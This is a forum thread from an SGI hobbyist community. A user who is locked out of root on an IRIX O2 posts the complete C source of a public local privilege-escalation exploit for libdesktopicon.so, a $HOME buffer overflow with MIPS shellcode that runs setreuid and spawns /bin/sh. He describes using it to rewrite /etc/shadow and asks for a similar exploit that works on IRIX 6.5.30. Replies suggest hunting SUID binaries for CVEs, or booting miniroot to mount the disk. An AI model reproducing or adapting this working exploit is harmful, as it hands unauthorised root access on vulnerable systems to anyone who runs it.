Anyone have any go-to hacks/exploits to get IRIX root access?

gijoe77

Member
Feb 18, 2019
71
38
18
so I was playing with an older o2 (6.5.22m) - I booted it and the DALLAS battery went dead and I guess it must have reset the date to some very early date - enough that when I tried to log in as root it asked me to change the password (I actually don't even use a root password - I know - security lulz!). I thought no problem so I changed the password, but it still won't let me log in - asking me to change the password again - it's an endless loop of aged out passwords or something.

When I put the drive back into a regular functioning o2, I still can't log in as root, and the password I changed it to is not working. Both of the o2's I'm working on are the r10k models, so it would be a hassle currently to install the impacted root drive as an option drive to edit the /etc/shadow file. I thought an easier approach would be to just log into one of the guest accounts I have, run a local privilege elevation exploit and edit the /etc/shadow file in that manner.

So I went through the various exploits I was able to find via google, and basically all of the ones I was able to find were for older versions of IRIX, and I wasn't able to find any for 6.5.30 (That said they explicitly work for 6.5.30)

I have a go-to exploit that works for 6.5.22 (file is called irx_libdesktopicon.c):
Code:
/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland        *://lsd-pl.net/ #*/
/*## libdesktopicon.so $HOME                                                 #*/

#define NOPNUM 1300
#define ADRNUM 900
#define PCHNUM 400

char setreuidcode[]=
    "\x30\x0b\xff\xff"    /* andi    $t3,$zero,0xffff     */
    "\x24\x02\x04\x01"    /* li      $v0,1024+1           */
    "\x20\x42\xff\xff"    /* addi    $v0,$v0,-1           */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "\x30\x44\xff\xff"    /* andi    $a0,$v0,0xffff       */
    "\x31\x65\xff\xff"    /* andi    $a1,$t3,0xffff       */
    "\x24\x02\x04\x64"    /* li      $v0,1124             */
    "\x03\xff\xff\xcc"    /* syscall                      */
;

char shellcode[]=
    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
    "\x24\x02\x03\xf3"    /* li      $v0,1011             */
    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
    "\x03\xe0\x00\x08"    /* jr      $ra                  */
;

char nop[]="\x24\x0f\x12\x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/\n");
    printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 ");
    printf("IP:ALL\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"HOME=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp);
}
Once I ran this on a regular user account, I was able to modify /etc/shadow

I've been thinking of upgrading to 6.5.30 from 6.5.22, but this exploit (I tend to think of it more as a time saver for me) wont work in 6.5.30. Other then playing around with setting up an external SCSI case and mounting my issue drive in that manner, I'm wondering if anyone has a slick exploit handy that works with 6.5.30 as well
 

Elf

Storybook / Retired, ex-staff
Feb 4, 2019
792
252
63
Mountain West (US)
Nothing specifically on hand but a search of the SUID root binaries combined with a CVE search may yield interesting results :)
 

flexion

Active member
Sep 23, 2020
196
137
43
Switzerland
shouldn't it be possible to boot sash and stuff from and install CD or over the net for miniroot and then mount the disk?
something like this..?
 
  • Like
Reactions: Elf

gijoe77

Member
Feb 18, 2019
71
38
18
shouldn't it be possible to boot sash and stuff from and install CD or over the net for miniroot and then mount the disk?
something like this..?
Yeah that's another way of doing it - it's still a hassle though (need a working CDROM, gotta have the install media handy).
 

About us

  • Silicon Graphics User Group (SGUG) is a community for users, developers, and admirers of Silicon Graphics (SGI) products. We aim to be a friendly hobbyist community for discussing all aspects of SGIs, including use, software development, the IRIX Operating System, and troubleshooting, as well as facilitating hardware exchange.

User Menu